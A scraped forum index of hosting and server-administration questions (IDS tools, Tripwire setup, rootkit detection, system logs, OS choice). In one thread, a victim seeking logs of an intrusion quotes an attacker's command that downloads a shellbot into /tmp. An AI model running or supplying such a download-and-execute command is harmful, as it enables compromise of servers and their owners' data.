IDS - Intrusion Detection System

Sep 25, 2007

I have recently been using snort but I need something ideally graphically based so that it is easy to use and find your way around.

Can anyone recommend an IDS product that has a GUI?

View 1 Replies


ADVERTISEMENT

Tripwire Intrusion Detection

Jul 30, 2007

I downloaded the tripwire version 2.4.1.1 but after the installation the /etc/tripwire/twinstall.sh file is not generated after the installation. I checked the contents of the RPM I downloaded and the script is not there.

How can I prepare the cfg file without this script?

[root@user]# rpm -qpl tripwire-2.4.1.1-1.i386.rpm

/etc/cron.daily/tripwire-check
/etc/tripwire
/etc/tripwire/twcfg.txt
/etc/tripwire/twpol.txt
/usr/sbin/siggen
/usr/sbin/tripwire
/usr/sbin/tripwire-setup-keyfiles
/usr/sbin/twadmin
/usr/sbin/twprint
/usr/share/doc/tripwire-2.4.1.1
/usr/share/doc/tripwire-2.4.1.1/COMMERCIAL
/usr/share/doc/tripwire-2.4.1.1/COPYING
/usr/share/doc/tripwire-2.4.1.1/ChangeLog
/usr/share/doc/tripwire-2.4.1.1/License-Issues
/usr/share/doc/tripwire-2.4.1.1/README.Fedora
/usr/share/doc/tripwire-2.4.1.1/TRADEMARK
/usr/share/doc/tripwire-2.4.1.1/policyguide.txt
/usr/share/doc/tripwire-2.4.1.1/tripwire.gif
/usr/share/man/man4/twconfig.4.gz
/usr/share/man/man4/twpolicy.4.gz
/usr/share/man/man5/twfiles.5.gz
/usr/share/man/man8/siggen.8.gz
/usr/share/man/man8/tripwire.8.gz
/usr/share/man/man8/twadmin.8.gz
/usr/share/man/man8/twintro.8.gz
/usr/share/man/man8/twprint.8.gz
/var/lib/tripwire
/var/lib/tripwire/report

View 3 Replies View Related

Intrusion Detection Tool Request

Jul 25, 2007

Is there a tool for intrusion detection where a central machine is responsible for requesting clients for file and directory information and reporting changes?

Do you know of any open source package preferable are available for RHEL4 and 5?

View 1 Replies View Related

Server Intrusion: Quick Fixes & What To Do

Nov 7, 2008

server intrusion: quick fixes

View 12 Replies View Related

Rootkit Detection On A Windows VPS

May 4, 2007

My Windows VPS has come under heavy attack by hackers trying to get through MSFTPSVC for the past month and they finally managed to somehow get in 2 days ago. Somehow, the "Allow anonymous login" setting was selected in my FTP settings and they got in.

They even managed to turn off my firewall. I guessing they used a buffer overflow or some other Windows Server 2003 weakness that was fixed in SP2 (too bad SP2 is'nt supported by SWSoft yet).

The attacks began less than 1 week after I had signed up with Virpus. I did'nt even have my domain name pointing to the server or a site up when the first set of dictionary attacks began. How common is that 0_0 ?

Anyway, since I now know they've gotten in I've run a virus check and everything looks clean but I really want to run some kind of root kit detection software. I've tried everything suggested on the antirootkit website but none of them seem to work on a VPS.

View 10 Replies View Related

Brute Force Detection (bfd)

Apr 6, 2007

ive just installed bfd on a new server:

[url]

And im getting the following in an email every 10 minutes:

Code:
/usr/local/bfd/conf.bfd: line 26:
: command not found
/usr/local/bfd/conf.bfd: line 38:
: command not found
/usr/local/bfd/conf.bfd: line 47:
: command not found
/usr/local/bfd/conf.bfd: line 59:
: command not found
/usr/local/bfd/conf.bfd: line 60:
: command not found
/usr/local/bfd/conf.bfd: line 76:
: command not found
/usr/local/bfd/conf.bfd: line 88:
: command not found
The email is being sent from:

Cron Daemon <root@hostname.com> (replaced hostname myself)

Now i know this isnt r-fx networks support but none of there support options seem to work so i figured id post here considering the amount of users that are likely to be using bfd (or you should be)

View 3 Replies View Related

Hacker Detection On Apache Log Files

Jul 2, 2009

I have a client that is certain someone is trying to hack her web-portal. I need to set up something that will alert me on suspicious activity on the server. For example someone fiddling with requests trying to make SQL / shell .. injection and similar threats.

Does any tool (for example bash script with grep) exist that would parse the raw apache logs and report if something is suspicious. Apache logs don't show the POST data so I am talking to admin to setup dump_io apache mod that enables this.

Or am I going into wrong direction here and there is whole another way to do this? I searched the web and forums for anything like this and didn't find anything.

View 4 Replies View Related

KVM Over IP System

Jul 23, 2008

I have a few different types of servers, all of which came with their own KVMoIP setup, aka DRAC and iLO which have worked only so so since their deployment. The HP iLO has performed absolutely flawlessly but the DRAC on the other hand has been nothing less than a complete nightmare.

I'm looking for a KVM over IP system that we can connect to multiple servers, mainly Dell, that is 100% reliable and completely stable. Not something that will be giving Java errors randomly when you actually need it to work.

So far I've came across the Raritan Dominion KX II which looks pretty promising. Is there any other KVM over IP systems or manufactures that I should look into? Has anyone used this and can you comment about its reliability?

View 14 Replies View Related

Slow System

Aug 11, 2008

Recently, my server has been running real slow and I don't know why... I've not noticed any increase in traffic (In fact it goes slow with no traffic on it...), what are some things I can look at to try and diagnose the problem? I know next to nothing about *nix so please speak in great detail.

Anytime I restart Apache, it loads quick for a few seconds then gets slow again...

Here are the top few processes listed on the process manager: .....

View 14 Replies View Related

Allocate System Ram

Jul 22, 2008

I have a VPS acct with Plesk, am peaking out my system ram at 128mb. Host said to allocate ,ore = purchase more. What I would like to do is hunt down where I am using the most of it. I have 8 sites (non that are too big). Most of them are wordpress sites.

Would caching help? Not sure where to look to find this out.

View 2 Replies View Related

Invoicing System

Dec 27, 2007

Is there any billing software/scripts that enable customer to view their invoice without login?

View 5 Replies View Related

System Cleaning

Aug 6, 2007

Is there anything like System cleaning in VPS (Linux with apache) ? I need to do system cleaning so that my space and performance can increase.

Is there anything like that in Linux?

View 2 Replies View Related

System Warning

Mar 21, 2007

Ive been getting the following System Warning every hour since I set the server up 5 days ago and Google hasn't been a lot of help in tracking down what it means and if I should be concerned. Im hoping someone here can point me in the right direction. Im running Windows 2003 Web Edition.

Quote:

Event Type:Warning
Event Source:LSASRV
Event Category:SPNEGO (Negotiator)
Event ID:40960
Date:3/20/2007
Time:7:45:33 PM
User:N/A
Computer:B02S08MR
Description:
The Security System detected an authentication error for the server DNS/ns.ufcom.com. The failure code from authentication protocol Kerberos was "There are currently no logon servers available to service the logon request.
(0xc000005e)".

For more information, see Help and Support Center at
[url]
Data:
0000: 5e 00 00 c0

View 6 Replies View Related

System Logs

Jul 26, 2007

I keep receiving hacking attempts from someone accessing my server and running commands like these:

Code:
hubberfix

sh -c cd /tmp;lwp-download [url]
shellbot

I cannot find any logs with these attempts. Or at least any with info like an IP address or host doing this.

Not to sound like a noob, but where can I find logs that would tell me all the commands run on my system? FYI, I'm running Debian Sarge, and I looked in "/var/log" and I can't find much of anything.

View 2 Replies View Related

Which Operating System

Feb 18, 2007

There's bloody heaps of them. Which one do I go for on my two new file servers? Which operating system out of these is the most common, has the most support, is most compatible? The server will be used to host videos and will run c-panel. A light weight OS is probably preferred but I really have no idea. And incase it helps, the servers have 512mb of ram, about 30 - 40GB of hDD (not actually sure) and an old AMD Duron.

CentOS
Debian
Direct Admin
Fedora
FreeBSD
Gentoo LiveCD
Redhat
Slackware

View 14 Replies View Related

Whole System Backup

Aug 26, 2007

I just spent over 10 hours on my node configuration (debian etch). I have installed a lot of stuff, made raid1 array, control panel, some tools, rules etc etc etc.

I dont want to see that some day something crash - and I will must start over with everything.

What you guys suggest as backup method, maybe some how-to backup WHOLE system with all files, raid configuration etc.

I dont need incremental backups at all - I just want to save/backup current system, and maybe restore if something bad would happen.

View 6 Replies View Related

Which The Best Operational System For Vps?

Jul 12, 2007

which of these operational systems is the best one for one vps?CentOS 4 (32bit)

CentOS 4 (64bit)
CentOS 5 (32bit)
Fedora Core 3 (32 bit)
Fedora Core 4 (32 bit)
Fedora Core 5 (32bit)
Debian Sarge 3 (32bit)
Gentoo 3 (32 bit)
Opensuse 10 (32 bit)
Suse 9 (64 bit)
Ubuntu 6 (32bit)
Windows 2003 Std

View 9 Replies View Related

Linux System

Jan 3, 2007

I am planning to start linux hosting but don't have much knowledge about linux Operating system... can I do this without having sufficient knowledge of linux background?

Also please suggest me some good links from where I can get basic linux command and some kind of flash tutorials from which I get to know how to do work in Appache and dns etc.

how to download tar file using Terminal,

View 6 Replies View Related

Recommended File System

Aug 2, 2009

I have a dedicated server running Linux CentsOS.

The default setup of my file system is:

/dev/sda1 450GB

tmpfs 2GB

/usr/tmpDSK 485 MB

My Disk size is 500GB

View 6 Replies View Related

Ticket System And WHM And Cpanel

Jul 14, 2009

I have VPS having whm/cpanel base, i also install RT ticket system, it install successfully, same way i did on 5 other server its ok, but on VPS due to apache different configuration it gives me.

You haven't yet configured your webserver to run RT. You appear to have installed RT's web interface correctly, but haven't yet configured your web server to "run" the RT server which powers the web interface. The next step is to edit your webserver's configuration file to instruct it to use RT's mod_perl, FastCGI or SpeedyCGI handler.

View 1 Replies View Related

Secure Virtuozzo System

Aug 14, 2008

Does someone know a good article for secure a virtuozzo node/host server?

View 0 Replies View Related

Which Content Management System (CMS)

Feb 24, 2009

I wondered which Content Management System (CMS) is the best for a website? I read that there are many to choose from, examples are Wordpress, Drupal, Joomla etc. Which CMS is more SEO Optimised?

Th website I will be setting up will be of the same genre as the following website startutor.sg. Therefore, I am wondering what CMS to use.

I thought of designing the website using AI or PSD and asked someone to code them (not sure of the terminology used) for me as I don't know anything about CSS, HTML etc.

View 14 Replies View Related

System Clock Off Continuously

May 12, 2009

One of our server's system clock seems to gradually creep away from the correct time. It has been causing us a lot of issues. After one day it becomes more than one hour off. After each minute it becomes a few seconds off.

Any ideas what could be causing this? It's uptime is ~2 months so it doesn't happen when it goes offline, it happens while it is running.

Right now we have a cronjob running ntpdate every few minutes as even with the ntpd service running it would end up off by several minutes when we would check. I have a feeling this isn't a very reliable fix though.

View 4 Replies View Related

Read-only System 3rd Time

Jun 11, 2009

I have brand new server with CentOS 5.3 and latest CentOS kernel (2.6.18-128.1.10.el5PAE).

I have brand new HDDs with no errors (HDDs have only 1000 power-on-hours, server CPU temperature is normal - between 35-42 C). My server went read-only without any reason. I need to fsck main / partition (/home is separated) and it cleaned journal, then server became online.

After 2 weeks it happens again - I did again fsck on / partition and it recovered journal as before. I decided to ask Data Center to replace RAID-1 card and memory - they did it. After 3 weeks server went read-only again.

I ssh into server and saw that kswapd0 process is using 100% cpu and load is over 170.

After fsck it recovered journal on / and server is again available.

View 14 Replies View Related

Perl System Mail

Jan 14, 2009

I am trying to write a perl script, it send's mail to a user i used system(mail -s test) and also send some messages using this.

but my issue is i receive mail with html code like <br> and so..

how to get a plain mail using this system command.

View 2 Replies View Related

Which Ticket System Does The Hostgator Use?

Feb 6, 2009

is there anybody knows which ticket system does the Hostgator use? Or that is theirs unique system?

View 14 Replies View Related

Server Became Read Only System

Mar 29, 2009

I had a linux server (CentOs 5, mysql5, php5, directadmin). I had problems with apache few days ago, that's why i hire sys. admin who tweak the system (install the PAE kernel), and some more configurations, and during last 7-8 days server work w/o any downtime (before this server had 1-2 downtimes per day-> OOM killer.)

Now i had only ssh access (emails, directadmin access - give "wrong password" answer). As told my sys.admin It became read only system.

I cann't even reboot system

Quote:

[root@server sa]# reboot
reboot: /usr/local/lib/libpng12.so.0: no version information available (required by /usr/lib/libcairo.so.2)

such few commands work, the most commands that i know don't work

Quote:

[root@server ~]# ls -la
ls: error while loading shared libraries: libacl.so.1: cannot open shared object file: No such file or directory

View 14 Replies View Related

HostMonster.com System Loads

Aug 21, 2008

I have a shared host with them for a few months which the disk usage for home/backup is usually around 85-95%. Right now I am experiencing very slow download speed. What about yours?

Server Load 2.92 (8 cpus)
Memory Used 42.6 %
Swap Used 0.01 %
Disk /dev/sdc1 (/home) 91 %
Disk /dev/sdd1 (/backup) 90 %
Disk /dev/sde1 (/backup/cpbackup/weekly) 43 %
Disk /dev/ram0 (/ramdisk) 24 %
Disk /dev/sdb1 (/) 22 %

View 5 Replies View Related







Copyrights 2005-15 www.BigResource.com, All rights reserved